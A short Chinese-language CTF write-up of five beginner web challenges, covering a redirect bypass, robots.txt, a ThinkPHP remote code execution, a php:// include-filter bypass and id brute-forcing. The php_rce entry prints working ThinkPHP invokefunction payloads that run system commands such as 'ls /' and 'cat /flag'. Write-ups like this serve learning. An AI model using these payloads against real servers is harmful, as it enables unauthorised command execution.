0x00 baby_web
难度不大,根据题目提示"初始页面",联想到index.php,但是如果在URL中直接输入index.php会自动跳转到1.php,所以bp直接抓包,修改http请求就可以了.
拿到flag
0x01 Training-WWW-Robots
考察到了robots协议,那么直接url输入robots.txt查看
看到提示fl0g.php
拿到flag
0x02 php_rce
ThinkPHP框架漏洞,payload网上一大把,以后有时间会写篇文章仔细分析这个漏洞,这里不再赘述
1.看看根目录下的文件 [?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /]
2.看到flag,尝试查看内容[?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag]
拿到flag.
0x03 Web_php_include
考察文件包含漏洞中的任意代码执行
进入题目给了一段代码,功能很简单,就是将page字符串中的"php://"关键字给替换为空,但是strstr函数对大小写敏感,所以直接大写绕过.
查看之
拿到flag
0x04 ics-06
拿到题目只有"报表中心"可以点开
看到[id=1]本以为是sql注入,但是尝试加引号等等操作之后没啥反应,索性上bp爆破试试看
看到id=2333时响应长度和其他值不一样
拿到flag
待更新----